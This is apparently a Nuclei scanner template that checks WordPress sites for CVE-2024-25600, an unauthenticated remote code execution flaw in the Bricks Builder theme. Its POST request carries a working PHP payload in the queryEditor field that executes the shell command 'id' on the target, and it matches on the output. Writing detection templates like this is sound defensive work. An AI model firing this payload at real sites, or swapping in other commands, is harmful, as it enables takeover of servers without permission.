64 lines
2.3 KiB
YAML
64 lines
2.3 KiB
YAML
id: CVE-2024-25600
|
||
|
||
info:
|
||
name: Unauthenticated Remote Code Execution – Bricks <= 1.9.6
|
||
author: christbowel
|
||
severity: critical
|
||
description: |
|
||
Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks <= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities
|
||
reference:
|
||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25600
|
||
- https://wpscan.com/vulnerability/afea4f8c-4d45-4cc0-8eb7-6fa6748158bd/
|
||
- https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6
|
||
- https://github.com/Chocapikk/CVE-2024-25600
|
||
- https://op-c.net/blog/cve-2024-25600-wordpresss-bricks-builder-rce-flaw-under-active-exploitation
|
||
metadata:
|
||
publicwww-query: "/wp-content/themes/bricks/"
|
||
verified: true
|
||
max-request: 2
|
||
tags: cve,cve2024,wpscan,wordpress,wp-plugin,wp,bricks,rce
|
||
|
||
http:
|
||
- raw:
|
||
- |
|
||
GET / HTTP/1.1
|
||
Host: {{Hostname}}
|
||
|
||
- |
|
||
POST /wp-json/bricks/v1/render_element HTTP/1.1
|
||
Host: {{Hostname}}
|
||
Content-Type: application/json
|
||
|
||
{
|
||
"postId": "1",
|
||
"nonce": "{{nonce}}",
|
||
"element": {
|
||
"name": "container",
|
||
"settings": {
|
||
"hasLoop": "true",
|
||
"query": {
|
||
"useQueryEditor": true,
|
||
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
|
||
"objectType": "post"
|
||
}
|
||
}
|
||
}
|
||
}
|
||
matchers-condition: and
|
||
matchers:
|
||
- type: regex
|
||
part: body
|
||
regex:
|
||
- "Exception:"
|
||
- "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"
|
||
condition: and
|
||
|
||
extractors:
|
||
- type: regex
|
||
name: nonce
|
||
part: body
|
||
group: 1
|
||
regex:
|
||
- 'nonce":"([0-9a-z]+)'
|
||
internal: true
|
||
# digest: 4a0a0047304502200825dcce3678d271573926754136ccd219fed98b4224e0d037ae0df099af337c022100ad0aff9a59a433275ece8b3ba693d51b7c10de39801f51c9256acefb4de536e5:922c64590222798bb761d5b6d8e72950 |